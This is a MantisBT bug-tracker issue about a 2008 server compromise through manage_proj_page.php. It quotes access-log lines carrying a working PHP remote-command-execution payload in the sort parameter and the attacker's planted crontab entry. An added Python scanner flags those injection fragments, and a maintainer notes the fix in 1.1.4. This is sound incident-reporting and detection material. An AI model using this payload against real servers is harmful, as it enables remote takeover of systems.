View Issue Details

ID: 0009858
Project: mantisbt
Category: security
View Status: public
Last Update: 2009-06-26 12:06
Reporter: cooper64
Assigned To: thraxisp
Priority: normal
Severity: crash
Reproducibility: N/A
Status: closed
Resolution: fixed
Product Version: 1.1.2
Summary: 0009858: Security problem - XSS attack possible in Mantis 1.1.2
Description

Because I still got no answer in the forum, I write my problem here again.
Last Sunday my server was attacked through a security hole in Mantis.

My provider informed me about the attack and that the file manage_proj_page.php was the attack point.

As a result, my crontab was overwritten with this entry:

        • /pages/eb/d0005490/home/htdocs/testserver/mantis/mc-root/update > /dev/null 2>&1

Also the directory mc-root was created in the mantis directory with some files (some look like system files; I'm not a Linux user) and a virus named Linux Procfake.

I have now completely closed Mantis.

Additional Information

Here is my log:

75.127.107.0 - - [15/Nov/2008:08:36:44 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 0 "-" "-"
75.127.107.0 - - [15/Nov/2008:08:36:48 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3758 "-" "-"
75.127.107.0 - - [15/Nov/2008:08:37:15 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 4190 "-" "-"
75.127.107.0 - - [15/Nov/2008:08:37:20 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3866 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:00:24 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 0 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:09 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 0 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:11 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3783 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:14 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3794 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:29 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3659 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:39 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3732 "-" "-"

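Added here as an example, not part of the report or of MantisBT itself: a small Python scanner that parses combined-format access-log lines like the ones above and flags requests whose query parameters carry the PHP code-injection fragments seen in the quoted requests, so the same pattern can be swept for in other logs. The sample lines are constructed from the excerpt, and the rule that a legitimate `sort` value is a plain column identifier is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample modelled on the log excerpt above: one bare request,
# one carrying the injected PHP, one benign sort request for contrast.
SAMPLE_LOG = """\
75.127.107.0 - - [15/Nov/2008:08:36:44 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 0 "-" "-"
75.127.107.0 - - [15/Nov/2008:08:36:48 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3758 "-" "-"
10.0.0.5 - - [15/Nov/2008:09:00:00 +0100] "GET /mantis/manage_proj_page.php?sort=name&dir=ASC HTTP/1.0" 200 5120 "Mozilla/5.0" "-"
"""
# Apache "combined" access-log format, as used in the report's excerpt.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
# Fragments that never belong in a sort parameter; each appears in the quoted request.
INDICATORS = ("passthru(", "base64_decode(", "$_SERVER[", "error_reporting(0)", "']);", "die;")
# Assumption: a legitimate sort value is a plain column identifier.
SAFE_SORT_RE = re.compile(r"^[A-Za-z0-9_.-]*$")

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def query_params(url):
    """Split the query on '&' only; ';' is a statement separator inside the payload."""
    if "?" not in url:
        return {}
    params = {}
    for pair in url.split("?", 1)[1].split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)  # %23 -> '#'
    return params

def scan_log(text):
    """One finding per request whose query carries injection indicators or a malformed sort."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for key, value in query_params(rec["url"]).items():
            hits = [i for i in INDICATORS if i in value]
            if hits or (key == "sort" and not SAFE_SORT_RE.match(value)):
                findings.append({"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                                 "path": rec["url"].split("?", 1)[0],
                                 "param": key, "indicators": hits})
    return findings
```

Running `scan_log(SAMPLE_LOG)` reports only the second sample line; the structural check on `sort` also catches variants that swap in other PHP functions, since a quote or parenthesis in a column name is never legitimate.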
Tags: No tags attached.

Relationships

duplicate of 0009704 (closed, giallu): Remote Code Execution in manage_proj_page.php

Activities

thraxisp

2008-11-19 11:11

reporter   ~0019943

This is fixed in 1.1.4